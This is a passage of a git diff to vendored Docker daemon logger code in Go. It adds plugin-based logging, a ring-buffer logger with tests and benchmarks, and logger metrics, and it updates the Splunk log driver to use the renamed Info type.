 		return "", fmt.Errorf("logger: can not resolve hostname: %v", err)
@@ -73,39 +91,39 @@ func (ctx *Context) Hostname() (string, error) {
 // Command returns the command that the container being logged was
 // started with. The Entrypoint is prepended to the container
 // arguments.
-func (ctx *Context) Command() string {
-	terms := []string{ctx.ContainerEntrypoint}
-	terms = append(terms, ctx.ContainerArgs...)
+func (info *Info) Command() string {
+	terms := []string{info.ContainerEntrypoint}
+	terms = append(terms, info.ContainerArgs...)
 	command := strings.Join(terms, " ")
 	return command
 }
 
 // ID Returns the Container ID shortened to 12 characters.
-func (ctx *Context) ID() string {
-	return ctx.ContainerID[:12]
+func (info *Info) ID() string {
+	return info.ContainerID[:12]
 }
 
 // FullID is an alias of ContainerID.
-func (ctx *Context) FullID() string {
-	return ctx.ContainerID
+func (info *Info) FullID() string {
+	return info.ContainerID
 }
 
 // Name returns the ContainerName without a preceding '/'.
-func (ctx *Context) Name() string {
-	return ctx.ContainerName[1:]
+func (info *Info) Name() string {
+	return strings.TrimPrefix(info.ContainerName, "/")
 }
 
 // ImageID returns the ContainerImageID shortened to 12 characters.
-func (ctx *Context) ImageID() string {
-	return ctx.ContainerImageID[:12]
+func (info *Info) ImageID() string {
+	return info.ContainerImageID[:12]
 }
 
 // ImageFullID is an alias of ContainerImageID.
-func (ctx *Context) ImageFullID() string {
-	return ctx.ContainerImageID
+func (info *Info) ImageFullID() string {
+	return info.ContainerImageID
 }
 
 // ImageName is an alias of ContainerImageName
-func (ctx *Context) ImageName() string {
-	return ctx.ContainerImageName
+func (info *Info) ImageName() string {
+	return info.ContainerImageName
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/metrics.go b/vendor/github.com/docker/docker/daemon/logger/metrics.go
new file mode 100644
index 0000000000..b7dfd38ec2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/metrics.go
@@ -0,0 +1,21 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"github.com/docker/go-metrics"
+)
+
+var (
+	logWritesFailedCount metrics.Counter
+	logReadsFailedCount  metrics.Counter
+	totalPartialLogs     metrics.Counter
+)
+
+func init() {
+	loggerMetrics := metrics.NewNamespace("logger", "", nil)
+
+	logWritesFailedCount = loggerMetrics.NewCounter("log_write_operations_failed", "Number of log write operations that failed")
+	logReadsFailedCount = loggerMetrics.NewCounter("log_read_operations_failed", "Number of log reads from container stdio that failed")
+	totalPartialLogs = loggerMetrics.NewCounter("log_entries_size_greater_than_buffer", "Number of log entries which are larger than the log buffer")
+
+	metrics.Register(loggerMetrics)
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin.go b/vendor/github.com/docker/docker/daemon/logger/plugin.go
new file mode 100644
index 0000000000..c66540ce52
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/plugin.go
@@ -0,0 +1,116 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types/plugins/logdriver"
+	"github.com/docker/docker/errdefs"
+	getter "github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/pkg/errors"
+)
+
+var pluginGetter getter.PluginGetter
+
+const extName = "LogDriver"
+
+// logPlugin defines the available functions that logging plugins must implement.
+type logPlugin interface {
+	StartLogging(streamPath string, info Info) (err error)
+	StopLogging(streamPath string) (err error)
+	Capabilities() (cap Capability, err error)
+	ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error)
+}
+
+// RegisterPluginGetter sets the plugingetter
+func RegisterPluginGetter(plugingetter getter.PluginGetter) {
+	pluginGetter = plugingetter
+}
+
+// GetDriver returns a logging driver by its name.
+// If the driver is empty, it looks for the local driver.
+func getPlugin(name string, mode int) (Creator, error) {
+	p, err := pluginGetter.Get(name, extName, mode)
+	if err != nil {
+		return nil, fmt.Errorf("error looking up logging plugin %s: %v", name, err)
+	}
+
+	client, err := makePluginClient(p)
+	if err != nil {
+		return nil, err
+	}
+	return makePluginCreator(name, client, p.ScopedPath), nil
+}
+
+func makePluginClient(p getter.CompatPlugin) (logPlugin, error) {
+	if pc, ok := p.(getter.PluginWithV1Client); ok {
+		return &logPluginProxy{pc.Client()}, nil
+	}
+	pa, ok := p.(getter.PluginAddr)
+	if !ok {
+		return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p))
+	}
+
+	if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 {
+		return nil, errors.Errorf("plugin protocol not supported: %s", p)
+	}
+
+	addr := pa.Addr()
+	c, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout())
+	if err != nil {
+		return nil, errors.Wrap(err, "error making plugin client")
+	}
+	return &logPluginProxy{c}, nil
+}
+
+func makePluginCreator(name string, l logPlugin, scopePath func(s string) string) Creator {
+	return func(logCtx Info) (logger Logger, err error) {
+		defer func() {
+			if err != nil {
+				pluginGetter.Get(name, extName, getter.Release)
+			}
+		}()
+
+		unscopedPath := filepath.Join("/", "run", "docker", "logging")
+		logRoot := scopePath(unscopedPath)
+		if err := os.MkdirAll(logRoot, 0700); err != nil {
+			return nil, err
+		}
+
+		id := stringid.GenerateNonCryptoID()
+		a := &pluginAdapter{
+			driverName: name,
+			id:         id,
+			plugin:     l,
+			fifoPath:   filepath.Join(logRoot, id),
+			logInfo:    logCtx,
+		}
+
+		cap, err := a.plugin.Capabilities()
+		if err == nil {
+			a.capabilities = cap
+		}
+
+		stream, err := openPluginStream(a)
+		if err != nil {
+			return nil, err
+		}
+
+		a.stream = stream
+		a.enc = logdriver.NewLogEntryEncoder(a.stream)
+
+		if err := l.StartLogging(filepath.Join(unscopedPath, id), logCtx); err != nil {
+			return nil, errors.Wrapf(err, "error creating logger")
+		}
+
+		if cap.ReadLogs {
+			return &pluginAdapterWithRead{a}, nil
+		}
+
+		return a, nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go
new file mode 100644
index 0000000000..e9a16af9b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go
@@ -0,0 +1,23 @@
+// +build linux freebsd
+
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"context"
+	"io"
+
+	"github.com/containerd/fifo"
+	"github.com/pkg/errors"
+	"golang.org/x/sys/unix"
+)
+
+func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) {
+	// Make sure to also open with read (in addition to write) to avoid borken pipe errors on plugin failure.
+	// It is up to the plugin to keep track of pipes that it should re-attach to, however.
+	// If the plugin doesn't open for reads, then the container will block once the pipe is full.
+	f, err := fifo.OpenFifo(context.Background(), a.fifoPath, unix.O_RDWR|unix.O_CREAT|unix.O_NONBLOCK, 0700)
+	if err != nil {
+		return nil, errors.Wrapf(err, "error creating i/o pipe for log plugin: %s", a.Name())
+	}
+	return f, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go
new file mode 100644
index 0000000000..2ad47cc077
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go
@@ -0,0 +1,12 @@
+// +build !linux,!freebsd
+
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"errors"
+	"io"
+)
+
+func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) {
+	return nil, errors.New("log plugin not supported")
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/proxy.go b/vendor/github.com/docker/docker/daemon/logger/proxy.go
new file mode 100644
index 0000000000..4a1c778108
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/proxy.go
@@ -0,0 +1,107 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"errors"
+	"io"
+)
+
+type client interface {
+	Call(string, interface{}, interface{}) error
+	Stream(string, interface{}) (io.ReadCloser, error)
+}
+
+type logPluginProxy struct {
+	client
+}
+
+type logPluginProxyStartLoggingRequest struct {
+	File string
+	Info Info
+}
+
+type logPluginProxyStartLoggingResponse struct {
+	Err string
+}
+
+func (pp *logPluginProxy) StartLogging(file string, info Info) (err error) {
+	var (
+		req logPluginProxyStartLoggingRequest
+		ret logPluginProxyStartLoggingResponse
+	)
+
+	req.File = file
+	req.Info = info
+	if err = pp.Call("LogDriver.StartLogging", req, &ret); err != nil {
+		return
+	}
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type logPluginProxyStopLoggingRequest struct {
+	File string
+}
+
+type logPluginProxyStopLoggingResponse struct {
+	Err string
+}
+
+func (pp *logPluginProxy) StopLogging(file string) (err error) {
+	var (
+		req logPluginProxyStopLoggingRequest
+		ret logPluginProxyStopLoggingResponse
+	)
+
+	req.File = file
+	if err = pp.Call("LogDriver.StopLogging", req, &ret); err != nil {
+		return
+	}
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type logPluginProxyCapabilitiesResponse struct {
+	Cap Capability
+	Err string
+}
+
+func (pp *logPluginProxy) Capabilities() (cap Capability, err error) {
+	var (
+		ret logPluginProxyCapabilitiesResponse
+	)
+
+	if err = pp.Call("LogDriver.Capabilities", nil, &ret); err != nil {
+		return
+	}
+
+	cap = ret.Cap
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type logPluginProxyReadLogsRequest struct {
+	Info   Info
+	Config ReadConfig
+}
+
+func (pp *logPluginProxy) ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error) {
+	var (
+		req logPluginProxyReadLogsRequest
+	)
+
+	req.Info = info
+	req.Config = config
+	return pp.Stream("LogDriver.ReadLogs", req)
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/ring.go b/vendor/github.com/docker/docker/daemon/logger/ring.go
new file mode 100644
index 0000000000..c675c1e83c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/ring.go
@@ -0,0 +1,223 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"errors"
+	"sync"
+	"sync/atomic"
+
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	defaultRingMaxSize = 1e6 // 1MB
+)
+
+// RingLogger is a ring buffer that implements the Logger interface.
+// This is used when lossy logging is OK.
+type RingLogger struct {
+	buffer    *messageRing
+	l         Logger
+	logInfo   Info
+	closeFlag int32
+}
+
+type ringWithReader struct {
+	*RingLogger
+}
+
+func (r *ringWithReader) ReadLogs(cfg ReadConfig) *LogWatcher {
+	reader, ok := r.l.(LogReader)
+	if !ok {
+		// something is wrong if we get here
+		panic("expected log reader")
+	}
+	return reader.ReadLogs(cfg)
+}
+
+func newRingLogger(driver Logger, logInfo Info, maxSize int64) *RingLogger {
+	l := &RingLogger{
+		buffer:  newRing(maxSize),
+		l:       driver,
+		logInfo: logInfo,
+	}
+	go l.run()
+	return l
+}
+
+// NewRingLogger creates a new Logger that is implemented as a RingBuffer wrapping
+// the passed in logger.
+func NewRingLogger(driver Logger, logInfo Info, maxSize int64) Logger {
+	if maxSize < 0 {
+		maxSize = defaultRingMaxSize
+	}
+	l := newRingLogger(driver, logInfo, maxSize)
+	if _, ok := driver.(LogReader); ok {
+		return &ringWithReader{l}
+	}
+	return l
+}
+
+// Log queues messages into the ring buffer
+func (r *RingLogger) Log(msg *Message) error {
+	if r.closed() {
+		return errClosed
+	}
+	return r.buffer.Enqueue(msg)
+}
+
+// Name returns the name of the underlying logger
+func (r *RingLogger) Name() string {
+	return r.l.Name()
+}
+
+func (r *RingLogger) closed() bool {
+	return atomic.LoadInt32(&r.closeFlag) == 1
+}
+
+func (r *RingLogger) setClosed() {
+	atomic.StoreInt32(&r.closeFlag, 1)
+}
+
+// Close closes the logger
+func (r *RingLogger) Close() error {
+	r.setClosed()
+	r.buffer.Close()
+	// empty out the queue
+	var logErr bool
+	for _, msg := range r.buffer.Drain() {
+		if logErr {
+			// some error logging a previous message, so re-insert to message pool
+			// and assume log driver is hosed
+			PutMessage(msg)
+			continue
+		}
+
+		if err := r.l.Log(msg); err != nil {
+			logrus.WithField("driver", r.l.Name()).
+				WithField("container", r.logInfo.ContainerID).
+				WithError(err).
+				Errorf("Error writing log message")
+			logErr = true
+		}
+	}
+	return r.l.Close()
+}
+
+// run consumes messages from the ring buffer and forwards them to the underling
+// logger.
+// This is run in a goroutine when the RingLogger is created
+func (r *RingLogger) run() {
+	for {
+		if r.closed() {
+			return
+		}
+		msg, err := r.buffer.Dequeue()
+		if err != nil {
+			// buffer is closed
+			return
+		}
+		if err := r.l.Log(msg); err != nil {
+			logrus.WithField("driver", r.l.Name()).
+				WithField("container", r.logInfo.ContainerID).
+				WithError(err).
+				Errorf("Error writing log message")
+		}
+	}
+}
+
+type messageRing struct {
+	mu sync.Mutex
+	// signals callers of `Dequeue` to wake up either on `Close` or when a new `Message` is added
+	wait *sync.Cond
+
+	sizeBytes int64 // current buffer size
+	maxBytes  int64 // max buffer size size
+	queue     []*Message
+	closed    bool
+}
+
+func newRing(maxBytes int64) *messageRing {
+	queueSize := 1000
+	if maxBytes == 0 || maxBytes == 1 {
+		// With 0 or 1 max byte size, the maximum size of the queue would only ever be 1
+		// message long.
+		queueSize = 1
+	}
+
+	r := &messageRing{queue: make([]*Message, 0, queueSize), maxBytes: maxBytes}
+	r.wait = sync.NewCond(&r.mu)
+	return r
+}
+
+// Enqueue adds a message to the buffer queue
+// If the message is too big for the buffer it drops the new message.
+// If there are no messages in the queue and the message is still too big, it adds the message anyway.
+func (r *messageRing) Enqueue(m *Message) error {
+	mSize := int64(len(m.Line))
+
+	r.mu.Lock()
+	if r.closed {
+		r.mu.Unlock()
+		return errClosed
+	}
+	if mSize+r.sizeBytes > r.maxBytes && len(r.queue) > 0 {
+		r.wait.Signal()
+		r.mu.Unlock()
+		return nil
+	}
+
+	r.queue = append(r.queue, m)
+	r.sizeBytes += mSize
+	r.wait.Signal()
+	r.mu.Unlock()
+	return nil
+}
+
+// Dequeue pulls a message off the queue
+// If there are no messages, it waits for one.
+// If the buffer is closed, it will return immediately.
+func (r *messageRing) Dequeue() (*Message, error) {
+	r.mu.Lock()
+	for len(r.queue) == 0 && !r.closed {
+		r.wait.Wait()
+	}
+
+	if r.closed {
+		r.mu.Unlock()
+		return nil, errClosed
+	}
+
+	msg := r.queue[0]
+	r.queue = r.queue[1:]
+	r.sizeBytes -= int64(len(msg.Line))
+	r.mu.Unlock()
+	return msg, nil
+}
+
+var errClosed = errors.New("closed")
+
+// Close closes the buffer ensuring no new messages can be added.
+// Any callers waiting to dequeue a message will be woken up.
+func (r *messageRing) Close() {
+	r.mu.Lock()
+	if r.closed {
+		r.mu.Unlock()
+		return
+	}
+
+	r.closed = true
+	r.wait.Broadcast()
+	r.mu.Unlock()
+}
+
+// Drain drains all messages from the queue.
+// This can be used after `Close()` to get any remaining messages that were in queue.
+func (r *messageRing) Drain() []*Message {
+	r.mu.Lock()
+	ls := make([]*Message, 0, len(r.queue))
+	ls = append(ls, r.queue...)
+	r.sizeBytes = 0
+	r.queue = r.queue[:0]
+	r.mu.Unlock()
+	return ls
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/ring_test.go b/vendor/github.com/docker/docker/daemon/logger/ring_test.go
new file mode 100644
index 0000000000..a2289cc667
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/ring_test.go
@@ -0,0 +1,299 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"context"
+	"strconv"
+	"testing"
+	"time"
+)
+
+type mockLogger struct{ c chan *Message }
+
+func (l *mockLogger) Log(msg *Message) error {
+	l.c <- msg
+	return nil
+}
+
+func (l *mockLogger) Name() string {
+	return "mock"
+}
+
+func (l *mockLogger) Close() error {
+	return nil
+}
+
+func TestRingLogger(t *testing.T) {
+	mockLog := &mockLogger{make(chan *Message)} // no buffer on this channel
+	ring := newRingLogger(mockLog, Info{}, 1)
+	defer ring.setClosed()
+
+	// this should never block
+	ring.Log(&Message{Line: []byte("1")})
+	ring.Log(&Message{Line: []byte("2")})
+	ring.Log(&Message{Line: []byte("3")})
+
+	select {
+	case msg := <-mockLog.c:
+		if string(msg.Line) != "1" {
+			t.Fatalf("got unexpected msg: %q", string(msg.Line))
+		}
+	case <-time.After(100 * time.Millisecond):
+		t.Fatal("timeout reading log message")
+	}
+
+	select {
+	case msg := <-mockLog.c:
+		t.Fatalf("expected no more messages in the queue, got: %q", string(msg.Line))
+	default:
+	}
+}
+
+func TestRingCap(t *testing.T) {
+	r := newRing(5)
+	for i := 0; i < 10; i++ {
+		// queue messages with "0" to "10"
+		// the "5" to "10" messages should be dropped since we only allow 5 bytes in the buffer
+		if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	// should have messages in the queue for "0" to "4"
+	for i := 0; i < 5; i++ {
+		m, err := r.Dequeue()
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(m.Line) != strconv.Itoa(i) {
+			t.Fatalf("got unexpected message for iter %d: %s", i, string(m.Line))
+		}
+	}
+
+	// queue a message that's bigger than the buffer cap
+	if err := r.Enqueue(&Message{Line: []byte("hello world")}); err != nil {
+		t.Fatal(err)
+	}
+
+	// queue another message that's bigger than the buffer cap
+	if err := r.Enqueue(&Message{Line: []byte("eat a banana")}); err != nil {
+		t.Fatal(err)
+	}
+
+	m, err := r.Dequeue()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(m.Line) != "hello world" {
+		t.Fatalf("got unexpected message: %s", string(m.Line))
+	}
+	if len(r.queue) != 0 {
+		t.Fatalf("expected queue to be empty, got: %d", len(r.queue))
+	}
+}
+
+func TestRingClose(t *testing.T) {
+	r := newRing(1)
+	if err := r.Enqueue(&Message{Line: []byte("hello")}); err != nil {
+		t.Fatal(err)
+	}
+	r.Close()
+	if err := r.Enqueue(&Message{}); err != errClosed {
+		t.Fatalf("expected errClosed, got: %v", err)
+	}
+	if len(r.queue) != 1 {
+		t.Fatal("expected empty queue")
+	}
+	if m, err := r.Dequeue(); err == nil || m != nil {
+		t.Fatal("expected err on Dequeue after close")
+	}
+
+	ls := r.Drain()
+	if len(ls) != 1 {
+		t.Fatalf("expected one message: %v", ls)
+	}
+	if string(ls[0].Line) != "hello" {
+		t.Fatalf("got unexpected message: %s", string(ls[0].Line))
+	}
+}
+
+func TestRingDrain(t *testing.T) {
+	r := newRing(5)
+	for i := 0; i < 5; i++ {
+		if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	ls := r.Drain()
+	if len(ls) != 5 {
+		t.Fatal("got unexpected length after drain")
+	}
+
+	for i := 0; i < 5; i++ {
+		if string(ls[i].Line) != strconv.Itoa(i) {
+			t.Fatalf("got unexpected message at position %d: %s", i, string(ls[i].Line))
+		}
+	}
+	if r.sizeBytes != 0 {
+		t.Fatalf("expected buffer size to be 0 after drain, got: %d", r.sizeBytes)
+	}
+
+	ls = r.Drain()
+	if len(ls) != 0 {
+		t.Fatalf("expected 0 messages on 2nd drain: %v", ls)
+	}
+
+}
+
+type nopLogger struct{}
+
+func (nopLogger) Name() string       { return "nopLogger" }
+func (nopLogger) Close() error       { return nil }
+func (nopLogger) Log(*Message) error { return nil }
+
+func BenchmarkRingLoggerThroughputNoReceiver(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputWithReceiverDelay0(b *testing.B) {
+	l := NewRingLogger(nopLogger{}, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func consumeWithDelay(delay time.Duration, c <-chan *Message) (cancel func()) {
+	started := make(chan struct{})
+	ctx, cancel := context.WithCancel(context.Background())
+	go func() {
+		close(started)
+		ticker := time.NewTicker(delay)
+		for range ticker.C {
+			select {
+			case <-ctx.Done():
+				ticker.Stop()
+				return
+			case <-c:
+			}
+		}
+	}()
+	<-started
+	return cancel
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay1(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(1*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay10(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(10*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay50(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(50*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay100(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(100*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay300(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(300*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+func BenchmarkRingLoggerThroughputConsumeDelay500(b *testing.B) {
+	mockLog := &mockLogger{make(chan *Message)}
+	defer mockLog.Close()
+	l := NewRingLogger(mockLog, Info{}, -1)
+	msg := &Message{Line: []byte("hello humans and everyone else!")}
+	b.SetBytes(int64(len(msg.Line)))
+
+	cancel := consumeWithDelay(500*time.Millisecond, mockLog.c)
+	defer cancel()
+
+	for i := 0; i < b.N; i++ {
+		if err := l.Log(msg); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
index f85832681a..8756ffa3b2 100644
--- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
@@ -1,10 +1,11 @@
 // Package splunk provides the log driver for forwarding server logs to
 // Splunk HTTP Event Collector endpoint.
-package splunk
+package splunk // import "github.com/docker/docker/daemon/logger/splunk"
 
 import (
 	"bytes"
 	"compress/gzip"
+	"context"
 	"crypto/tls"
 	"crypto/x509"
 	"encoding/json"
@@ -15,13 +16,15 @@ import (
 	"net/url"
 	"os"
 	"strconv"
+	"strings"
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/pools"
 	"github.com/docker/docker/pkg/urlutil"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -39,6 +42,7 @@ const (
 	splunkGzipCompressionKey      = "splunk-gzip"
 	splunkGzipCompressionLevelKey = "splunk-gzip-level"
 	envKey                        = "env"
+	envRegexKey                   = "env-regex"
 	labelsKey                     = "labels"
 	tagKey                        = "tag"
 )
@@ -52,6 +56,8 @@ const (
 	defaultBufferMaximum = 10 * defaultPostMessagesBatchSize
 	// Number of messages allowed to be queued in the channel
 	defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize
+	// maxResponseSize is the max amount that will be read from an http response
+	maxResponseSize = 1024
 )
 
 const (
@@ -61,6 +67,8 @@ const (
 	envVarStreamChannelSize     = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE"
 )
 
+var batchSendTimeout = 30 * time.Second
+
 type splunkLoggerInterface interface {
 	logger.Logger
 	worker()
@@ -140,20 +148,20 @@ func init() {
 }
 
 // New creates splunk logger driver using configuration passed in context
-func New(ctx logger.Context) (logger.Logger, error) {
-	hostname, err := ctx.Hostname()
+func New(info logger.Info) (logger.Logger, error) {
+	hostname, err := info.Hostname()
 	if err != nil {
 		return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName)
 	}
 
 	// Parse and validate Splunk URL
-	splunkURL, err := parseURL(ctx)
+	splunkURL, err := parseURL(info)
 	if err != nil {
 		return nil, err
 	}
 
 	// Splunk Token is required parameter
-	splunkToken, ok := ctx.Config[splunkTokenKey]
+	splunkToken, ok := info.Config[splunkTokenKey]
 	if !ok {
 		return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey)
 	}
@@ -162,7 +170,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 
 	// Splunk is using autogenerated certificates by default,
 	// allow users to trust them with skipping verification
-	if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok {
+	if insecureSkipVerifyStr, ok := info.Config[splunkInsecureSkipVerifyKey]; ok {
 		insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr)
 		if err != nil {
 			return nil, err
@@ -171,7 +179,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	// If path to the root certificate is provided - load it
-	if caPath, ok := ctx.Config[splunkCAPathKey]; ok {
+	if caPath, ok := info.Config[splunkCAPathKey]; ok {
 		caCert, err := ioutil.ReadFile(caPath)
 		if err != nil {
 			return nil, err
@@ -181,12 +189,12 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		tlsConfig.RootCAs = caPool
 	}
 
-	if caName, ok := ctx.Config[splunkCANameKey]; ok {
+	if caName, ok := info.Config[splunkCANameKey]; ok {
 		tlsConfig.ServerName = caName
 	}
 
 	gzipCompression := false
-	if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok {
+	if gzipCompressionStr, ok := info.Config[splunkGzipCompressionKey]; ok {
 		gzipCompression, err = strconv.ParseBool(gzipCompressionStr)
 		if err != nil {
 			return nil, err
@@ -194,7 +202,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	gzipCompressionLevel := gzip.DefaultCompression
-	if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok {
+	if gzipCompressionLevelStr, ok := info.Config[splunkGzipCompressionLevelKey]; ok {
 		var err error
 		gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32)
 		if err != nil {
@@ -202,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		}
 		gzipCompressionLevel = int(gzipCompressionLevel64)
 		if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression {
-			err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).",
+			err := fmt.Errorf("not supported level '%s' for %s (supported values between %d and %d)",
 				gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression)
 			return nil, err
 		}
@@ -210,14 +218,15 @@ func New(ctx logger.Context) (logger.Logger, error) {
 
 	transport := &http.Transport{
 		TLSClientConfig: tlsConfig,
+		Proxy:           http.ProxyFromEnvironment,
 	}
 	client := &http.Client{
 		Transport: transport,
 	}
 
-	source := ctx.Config[splunkSourceKey]
-	sourceType := ctx.Config[splunkSourceTypeKey]
-	index := ctx.Config[splunkIndexKey]
+	source := info.Config[splunkSourceKey]
+	sourceType := info.Config[splunkSourceTypeKey]
+	index := info.Config[splunkIndexKey]
 
 	var nullMessage = &splunkMessage{
 		Host:       hostname,
@@ -228,14 +237,17 @@ func New(ctx logger.Context) (logger.Logger, error) {
 
 	// Allow user to remove tag from the messages by setting tag to empty string
 	tag := ""
-	if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" {
-		tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if tagTemplate, ok := info.Config[tagKey]; !ok || tagTemplate != "" {
+		tag, err = loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 		if err != nil {
 			return nil, err
 		}
 	}
 
